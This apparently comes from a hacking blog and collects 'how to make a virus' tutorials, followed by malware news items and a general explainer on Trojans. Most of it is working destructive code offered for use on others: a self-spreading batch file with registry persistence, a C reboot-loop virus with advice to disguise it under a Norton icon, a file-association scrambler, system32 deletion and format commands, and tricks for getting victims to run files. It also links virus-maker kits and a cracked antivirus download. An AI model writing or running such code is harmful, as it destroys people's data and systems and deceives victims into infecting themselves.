How To Make Virus

How To Make Virus

Hello Friends,
Here is the tutorial for making virus.and be careful it might be harmful to your pc

Open notepad and type this:
"lol=msgbox (“Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot”,20,”Warning”)"
and save it as virus.vbs. 
and go to the folder that contains it and open it if a window pops out saying that a virus has been detected,then it’s working. Press yes or no to close the window and put it in the startup folder of the victim’s account.
On startup the window should appear.The Yes and No button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox (“Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot”,20,”Warning”)

Simple batch virus. (This is quite Destructive !)

This one is a simple batch virus
Just copy and paste the code given below in notepad and save it as game.bat(not .txt). Be carefull & Don’t run on your PC Just Enjoy It and Play With Your Friends.

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

What does it Do ?
1) Copies itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer.
Best Of Luck

Make A Virus Program In C to Restart the Computer at Every Startup

Make A Virus Program In C to Restart the Computer at Every Startup

Hello Friends,
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.

#include

#include

#include

int found,drive_no;char buff[128];

void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}

void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;

case 2:

target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;

case 3:

target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;

case 4:

target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);

system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;

default:

exit(0);

}

while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}

else

system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.
Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here
2. The downloaded file will be Sysres.C
Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.
LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

Extension changing Virus

Extension changing Virus

Hello Friends,

What is Extension changer ? Assume that all images (*.jpeg, Gif etc) are by default opening with “Windows Picture and Fax Viewer” but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.

1. Open a Notepad and copy and paste the below code

    @echo off
    assoc .txt=jpegfile
    assoc .exe=htmlfile
    assoc .jpeg=avifile
    assoc .png=mpegfile
    assoc .mpeg=txtfile
    assoc .sys=regfile
    msg Your System got Infected…..
    exit

2. Save it as virus.bat, and now you are ready to go…
3. Execute this on Victims computer
This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….

How to make a virus with notepad

How to make a virus with notepad

 

Index
1. Tools
2. What makes a virus a virus
3. Making your first batch file
4. Making a batch virus
5. Destructive commands
6. Most common tricks used to make someone open the file


1. Tools
To make a batch program you will need a text program (ex. Word,notepad,wordpad etc…) A keyboard if you don’t have one you can use the ON-screen keyboard
To get to the on-screen keyboard start>all programs>accessories>accessibility


2. What makes a virus a virus
When people think of a virus they think of a computer virus but the word virus came from a virus that’s in your body. They also think a virus is meant to delete or destroy things. They normally do but a virus is called a virus because, it copies itself. Like a virus in your body it copies it self to other cells cause it can’t live with out a host. Same with a computer virus with out a file or a program a virus can’t be made.
So all a computer virus is: a program that copies it self ,but some people put destructive code in it.

3. Making a Batch file
I’m going to use notepad you can use what ever you want

We are also going to make a “Hello World” Application that is the first program you make in any language

When making a batch file you are always going to use this line first

@echo off

You can turn it on if you like. All that does is telling the program not to tell its location. If you turn it on then the program will tell were it is at on the computer.
You can experiment a little if you want.

Now we are going to make it say Hello World

To do this we need a echo command which looks like this
echo

This tells the program to write something since we want it to say Hello World we are going to type Hello World next to echo to make it look like this

echo Hello World

so at this point you should have

@echo off
echo Hello World

now go to file save and name it test.bat ( you can name it whatever you want as long as it has .bat at the end.)
Save it to the desktop so you can get to it faster.

Then run it



You should of have a black box open and close really fast

To fix this we need a pause command and we will also need a goto command

The goto command is the most importent command

If you dont know the goto command tell it were to go to next.

since we need a pause command we want it to go to pause so we need to write goto pause like this

goto pause

now u should have

@echo off
echo Hello World
goto pause

now we need a subsection name pause

you make a sub section by putting a : by the first word like this

:start

or

:end

,but we said go to pause so we need one name pause like this

ause

then under that we are goin to write pause

ause
pause

this just makes it were it will keep the box open till you press a key

Optionl

At the end you can put a exit at the end of pause were the goto command should go ,but you dont have to.

save at run it now.You should be able to read your text now

4. Making a Batch file into a virus

This is alot easier then some people think.

To make a virus you just need the copy command which looks like this

copy

so lets make a new one by reading section 3 you should know you need the @echo off

@echo off
copy

allright we are going to name this file first

and we are going to make it copy itself to C:\WINDOWS just because no one looks in their

this is what it looks like (i will explain it)

@echo off
copy first C:\WINDOWS

copy-tells it to copy
first-is just the name of the file we want to copy
C:\WINDOWS- is the place you want to copy to

that is a virus

5. Destructive commands

If you get pissed at someone you might want to send him someting to mess with him. Here are some commands to add to the virus.

del -this del files

del file name
del (.txt*)

the (.txt*) would delete all txt files on the computer the * at the end just means all instead of a file called .txt

deltree- this deletes the whole folder

you can remeber it like this

Think of a tree if you type del you are only deleting a part of the tree ,but if you type deltree you are deleting the whole tree

format- this deltes everything

format c:

this delets everything in the c drive

open

this is just fun to use to scare some one but not do damage to something

open name of file

like to open notepad type

open notepad

to open microsoft paint type

open mspaint

just put ta crap load in their

also the next one that can be very usefull is looping

this will make the file repet it self til it is shut off

say your first sub section is called start

you would just make the goto command to go to start like

@echo off
:start
start notepad
goto start

that will open notepad over and over and if they dont close it it can crash their computer

to open the command window you have to use var. like %% (not going to explain var. it would be confusing)

@echo off
:whatever
start %0
goto whatever

this will open the black box over and over

6. Most command tricks

people will put it in a folder with a couple read me doc. and call it a game

people will say check this out it is so cool

people will say check out this hack or cheat i found for this game

to check if the are good do this

tell them to put it in a zip folder and send it

unzip and right click on the program(dont open it)

and press edit

that will show the sorce code and if you see something you dont like then delete it

Examples

for just a simp msg its

@echo off
echo *insert MSG here*
goto pause
ause
pause

for the a rapid command propt type screen its

@echo off
:whatever
start %0
goto whatever

for rapid note pad its


@echo off
:start
start notepad
goto start

for rapid ms paint its


@echo off
:start
start ms paint
goto start

Quite Long but good to try...

Share
|

Making a file that destroys ur victims pc

Making a file that destroys ur victims pc

 

I m not responsible for the damage caused by this file."

1. Open Notepad

2. write the above command : -
del c:\WINDOWS\system32\**/q

3. Save the above notepad with the extension ".bat or .cmd" as u want

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!!!!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created delete all files from ur

system32 folder and when u restart ur pc it will not start

bcz system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automaitcally get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the computer, so thik again before trying this on anyone's pc)

virusssssssssss

Email Worm Spreading Like Wildfire – W32.Imsolk.B@mm

A fast-moving email worm that began spreading on Thursday has been able to affect hundreds of thousands of computers worldwide, anti-virus provider Symantec warned.


The email arrives with the subject “Here you have.” An executable screensaver that’s disguised as a PDF document then tries to send the same message to everyone listed in the recipient’s address book. The .scr file is a variation of the W32.Imsolk.A@mm worm Symantec discovered last month.


In addition to spreading through email, it can propagate through mapped drives, autorun and instant messenger. It also has the ability to disable various security programs.


The worm is a throwback to attacks not seen in almost a decade, when the Anna Kournikova and I Love You attacks wreaked havoc on email systems worldwide. The Here You Go worm appears to different in that the malicious payload is downloaded from a page on members.multimania.com, rather than being attached to the email. That could make efforts to eradicate the worm easier.


Then again, McAfee said multiple variants of the worm appear to be spreading, so it’s not yet clear that the malicious screensaver is hosted by a single source.


Source: The Register
More Info: New Round of Email Worm, “Here you have”

Vodafone Distributes Mariposa Botnet:

 

Here is yet another example of a company distributing malware to its userbase. Unfortunately it probably won’t be the last.
Today one of our colleagues received a brand new Vodafone HTC Magic with Google’s Android OS. “Neat” she said. Vodafone distributes this phone to its userbase in some European countries and it seems affordable as you can get it for 0€ or 1€ under certain conditions.
The interesting thing is that when she plugged the phone to her PC via USB her Panda Cloud Antivirus went off, detecting both an autorun.inf and autorun.exe as malicious. A quick look into the phone quickly revealed it was infected and spreading the infection to any and all PCs that the phone would be plugged into.


A quick analysis of the malware reveals that it is in fact a Mariposa bot client. This one, unlike the one announced last week which was run by spanish hacker group “DDP Team”, is run by some guy named “tnls” as the botnet-control mechanism shows:

00129953 |. 81F2 736C6E74 |XOR EDX,746E6C73 ; ”tnls”

The Command & Control servers which it connects to via UDP to receive instructions are:

mx5.nadnadzz2.info
mx5.channeltrb123trb.com
mx5.ka3ek2.com

Once infected you can see the malware “phoning home” to receive further instructions, probably to steal all of the user’s credentials and send them to the malware writer.
Interestingly enough, the Mariposa bot is not the only malware I found on the Vodafone HTC Magic phone. There’s also a Confiker and a Lineage password stealing malware. I wonder who’s doing QA at Vodafone and HTC these days.
Source: Panda Research Blog

TeraBIT Virus Maker 2.8 SE:

TeraBIT Virus Maker 2.8 SE
(Backdoor.Win32.VB.bna)

by m_reza00
Written in Visual Basic
Released in September 2007
Made in Iran
dropped files:
c:\WINDOWS\system32\csmm.exe
Size: 16,950 bytes
startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon “Shell”
Old data: Explorer.exe
New data: explorer.exe C:\WINDOWS\system32\csmm.exe
Tested on Windows XP
September 19, 2007
Download :
http://rapidshare.com/files/96994198/TeraBIT_VM_2_1.8.zip.html

Virus Maker Professional 2008

Virus Maker Professional 2008
Scanned By Kaspersky Internet Security 325, Nothing Found
Just Use it with all ur Own Risk to produce any Malicious/virus/Trojans/Spyware
All Info inside rar
Download :
http://www.4shared.com/file/43506955/93326338/CreAtive_By_Dark_Man_2009.html
http://www.2shared.com/file/3115492/e3275d24/CreAtive_By_Dark_Man_2009.html
http://rapidshare.com/files/99661790…k_Man_2009.rar
Password : LoloUOwnRisk

ESET NOD32 Antivirus v3.0.672 Business Edition Full:

ESET NOD32 Antivirus System – Integrated, Real-Time Protection against viruses, worms, trojans, spyware, adware, phishing

, and hackers. Best detection, fastest performance & smallest footprint.
NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers.

Changes in version 3.0.672:
• Fixed problem causing instability on Microsoft Windows Vista 64-bit
• Fixed problem in anti spam module causing “Unexpected exception 003 and 007″ error messages
Size:19.6 MB
Download NOD32 Antivirus 3.0.672 Business :
http://rapidshare.com/files/147336388/ESET_NOD32_Antivirus_v3.0.672_Business_Edition_Full.rar

International Space Station Infected By Virus:

  NASA confirmed this week that a computer on the International Space Station is infected with a virus.

The malicious software is called W32.TGammima.AG, and technically it’s a worm.
The interesting point, other than how NASA could let this happen, is the way the worm spreads–on USB flash drives.
Malicious software spread by USB flash drives and other removable media takes advantage of a questionable design decision by Microsoft.
Windows is very happy to run a program automatically when a USB flash drive is inserted into a PC.
How convenient, both for end users and for bad guys.
Source : CNET
http://news.cnet.com/8301-13554_3-10027754-33.html

          

The Trojan Horse

-: The Trojan Horse :-

What is a Trojan ?
"A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia

"A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory

Types of Trojan :-
The different types of Trojan Horses are as follows-

1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.

2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.

3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer. This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.

4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.

5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.

6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.

7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual. In this case they are well known as "Zombies".

How Trojan Works ?
Trojans typically consist of two parts, a client part and a server part. When a victim (unknowingly) runs a Trojan server on his machine, the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan. The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well. When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.

       It is necessary for the attacker to know the victim’s IP address to connect to his/her machine. Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.

       Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.

How Trojan Horses Are Installed ?
Infection from Trojans is alarmingly simple. Following are very common ways to become infected that most computer users perform on a very regular basis.

• Software Downloads
• Websites containing executable content (ActiveX control)
• Email Attachments
• Application Exploits (Flaws in a web applications)
• Social Engineering Attacks

The Removal :-
Antivirus software is designed to detect and delete Trojan horses ideally preventing them from ever being installed.

Computer Viruses

-: Computer Viruses :-

What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user. Types of viruses :-
The different types of viruses are as follows-

Read more »